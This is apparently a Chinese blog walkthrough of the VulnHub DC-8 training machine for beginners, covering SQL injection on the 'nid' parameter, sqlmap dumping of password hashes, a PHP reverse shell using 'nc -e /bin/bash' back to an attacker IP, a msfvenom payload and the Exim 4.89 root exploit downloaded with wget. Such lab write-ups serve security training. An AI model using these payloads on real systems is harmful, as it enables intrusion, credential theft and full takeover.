靶机DC-8(详细渗透,适合新手渗透)

目录

  • 靶机DC-8 (详细渗透,适合新手渗透)
    • 0x01靶机描述
    • 0x02环境搭建
        • 1. 下载并导入靶机
        • 2. 查看网络适配器
        • 3. 启动靶机
    • 0x03靶机渗透
      • 一、 信息收集
          • 1. 主机发现
          • 2. 端口扫描
          • 3. 详细扫描
          • 4. 目录扫描
          • 5. gobuster目录扫描
          • 6. 网站指纹识别
      • 二、 漏洞挖掘
        • 手工sql注入
          • 1. 通过手工验证,此处url含有sql注入漏洞
          • 2. 判断字段数
          • 3. 判断显示位置
          • 4. 查看当前数据库
          • 5. 查找库d7db中所有的表
          • 6. 查找uesrs表中所有的列
          • 7. 查询表中的数据
        • sqlmap自动化执行
          • 1. 查当前数据库
          • 2. 查表
          • 3. 查列
          • 4. 查数据
          • 4. 使用John进行暴力破解
          • 5. 可以将破解出来的密码尝试ssh远程登录
          • 6. 在此网页尝试登录,该网页由前面目录扫描得到
        • 远程代码执行漏洞
          • 1.找到可以编辑php代码的地方
          • 2.尝试写phpinfo代码
      • 三、 漏洞利用
        • 方法一:
          • 1. 编写反弹shell脚本
          • 2.保存提交前开启kali进行监听
          • 3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
        • 方法二:
          • 1. 使用msfvenom制作反弹shell脚本
          • 2.将php代码复制到网站中
          • 3. kali设置msf选项,进行监听
          • 4.提交代码(此时后台默认执行所编写的php脚本代码)
          • 5. 拿到shell,并用python打开一个标准shell
      • 四、 提权
          • 1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
          • 2.查看命令exim4命令版本
          • 3.利用serachsploit查找exim命令的漏洞
          • 4.进行查看用法,发现有两个使用方法
          • 5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务
          • 6.将46996.sh下载到靶机
          • 7.然后我们再重新进行上传
          • 8.查看flag
    • 0x04实验总结

靶机DC-8 (详细渗透,适合新手渗透)

0x01靶机描述

靶机信息

链接 https://www.vulnhub.com/entry/dc-8,367/
发布日期 2019年9月4日
作者 DCAU
难度 简单

0x02环境搭建

1. 下载并导入靶机

打开vmware-文件-打开-DC-8.ova

靶机DC-8(详细渗透,适合新手渗透)_第1张图片靶机DC-8(详细渗透,适合新手渗透)_第2张图片

2. 查看网络适配器

将靶机网络适配器改为NAT模式
靶机DC-8(详细渗透,适合新手渗透)_第3张图片

3. 启动靶机

点击 ▶靶机,开启成功
靶机DC-8(详细渗透,适合新手渗透)_第4张图片

0x03靶机渗透

一、 信息收集

1. 主机发现

在这里插入图片描述
靶机DC-8(详细渗透,适合新手渗透)_第5张图片

2. 端口扫描

靶机DC-8(详细渗透,适合新手渗透)_第6张图片

3. 详细扫描

靶机DC-8(详细渗透,适合新手渗透)_第7张图片

4. 目录扫描

靶机DC-8(详细渗透,适合新手渗透)_第8张图片

5. gobuster目录扫描

为了避免漏扫,gobuster再进行目录扫描

靶机DC-8(详细渗透,适合新手渗透)_第9张图片

6. 网站指纹识别

在这里插入图片描述

二、 漏洞挖掘

手工sql注入

1. 通过手工验证,此处url含有sql注入漏洞

http://192.168.30.206/?nid=2 and 1=1 --+
靶机DC-8(详细渗透,适合新手渗透)_第10张图片

http://192.168.30.206/?nid=2 and 1=2 --+
靶机DC-8(详细渗透,适合新手渗透)_第11张图片

2. 判断字段数

http://192.168.30.206/?nid=2 order by 1 --+
靶机DC-8(详细渗透,适合新手渗透)_第12张图片

http://192.168.30.206/?nid=2 order by 2 --+
靶机DC-8(详细渗透,适合新手渗透)_第13张图片

所以可以看出字段数为1

3. 判断显示位置

http://192.168.30.206/?nid=-2 union select 1 --+
靶机DC-8(详细渗透,适合新手渗透)_第14张图片

4. 查看当前数据库

靶机DC-8(详细渗透,适合新手渗透)_第15张图片

5. 查找库d7db中所有的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

靶机DC-8(详细渗透,适合新手渗透)_第16张图片

6. 查找uesrs表中所有的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

靶机DC-8(详细渗透,适合新手渗透)_第17张图片

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
靶机DC-8(详细渗透,适合新手渗透)_第18张图片

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

靶机DC-8(详细渗透,适合新手渗透)_第19张图片

sqlmap自动化执行

1. 查当前数据库
sqlmap -u 'http://192.168.30.206/?nid=2' -current-db

请添加图片描述请添加图片描述

2. 查表
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables

请添加图片描述

3. 查列
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns

请添加图片描述靶机DC-8(详细渗透,适合新手渗透)_第20张图片

4. 查数据
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump

请添加图片描述靶机DC-8(详细渗透,适合新手渗透)_第21张图片查询到两组数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4. 使用John进行暴力破解

靶机DC-8(详细渗透,适合新手渗透)_第22张图片破解出john的密码trutle

5. 可以将破解出来的密码尝试ssh远程登录

发现ssh远程登录失败,发现需要使用公私钥登录
靶机DC-8(详细渗透,适合新手渗透)_第23张图片123

6. 在此网页尝试登录,该网页由前面目录扫描得到
http://192.168.30.206/user

登录成功
靶机DC-8(详细渗透,适合新手渗透)_第24张图片靶机DC-8(详细渗透,适合新手渗透)_第25张图片

  • 远程代码执行漏洞

1.找到可以编辑php代码的地方

靶机DC-8(详细渗透,适合新手渗透)_第26张图片靶机DC-8(详细渗透,适合新手渗透)_第27张图片

2.尝试写phpinfo代码

靶机DC-8(详细渗透,适合新手渗透)_第28张图片靶机DC-8(详细渗透,适合新手渗透)_第29张图片靶机DC-8(详细渗透,适合新手渗透)_第30张图片
发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。

三、 漏洞利用

方法一:

1. 编写反弹shell脚本

我们尝试执行PHP反弹shell脚本,将原有的

flag

进行保留,防止报错

<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>

靶机DC-8(详细渗透,适合新手渗透)_第31张图片

2.保存提交前开启kali进行监听

靶机DC-8(详细渗透,适合新手渗透)_第32张图片

3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell

靶机DC-8(详细渗透,适合新手渗透)_第33张图片靶机DC-8(详细渗透,适合新手渗透)_第34张图片靶机DC-8(详细渗透,适合新手渗透)_第35张图片

方法二:

1. 使用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
 R >php_shell.txt

靶机DC-8(详细渗透,适合新手渗透)_第36张图片

2.将php代码复制到网站中

靶机DC-8(详细渗透,适合新手渗透)_第37张图片

3. kali设置msf选项,进行监听

靶机DC-8(详细渗透,适合新手渗透)_第38张图片请添加图片描述
靶机DC-8(详细渗透,适合新手渗透)_第39张图片

4.提交代码(此时后台默认执行所编写的php脚本代码)

靶机DC-8(详细渗透,适合新手渗透)_第40张图片

5. 拿到shell,并用python打开一个标准shell
python -c 'import pty;pty.spawn("/bin/bash")'

靶机DC-8(详细渗透,适合新手渗透)_第41张图片

四、 提权

1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
find / -perm -u=s -type f 2>/dev/null

靶机DC-8(详细渗透,适合新手渗透)_第42张图片

2.查看命令exim4命令版本

Exim version 4.89
靶机DC-8(详细渗透,适合新手渗透)_第43张图片

3.利用serachsploit查找exim命令的漏洞

靶机DC-8(详细渗透,适合新手渗透)_第44张图片

4.进行查看用法,发现有两个使用方法

靶机DC-8(详细渗透,适合新手渗透)_第45张图片

5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务

靶机DC-8(详细渗透,适合新手渗透)_第46张图片

6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh

靶机DC-8(详细渗透,适合新手渗透)_第47张图片

进行赋权
靶机DC-8(详细渗透,适合新手渗透)_第48张图片

执行,但是发现两种方法均发生错误
请添加图片描述

原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix
请添加图片描述

7.然后我们再重新进行上传

靶机DC-8(详细渗透,适合新手渗透)_第49张图片

使用第二个提权命令进行提权成功

./46996.sh -m netcat

靶机DC-8(详细渗透,适合新手渗透)_第50张图片
靶机DC-8(详细渗透,适合新手渗透)_第51张图片

8.查看flag

靶机DC-8(详细渗透,适合新手渗透)_第52张图片

0x04实验总结

这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透

你可能感兴趣的:(靶机渗透,靶机,渗透测试,web安全)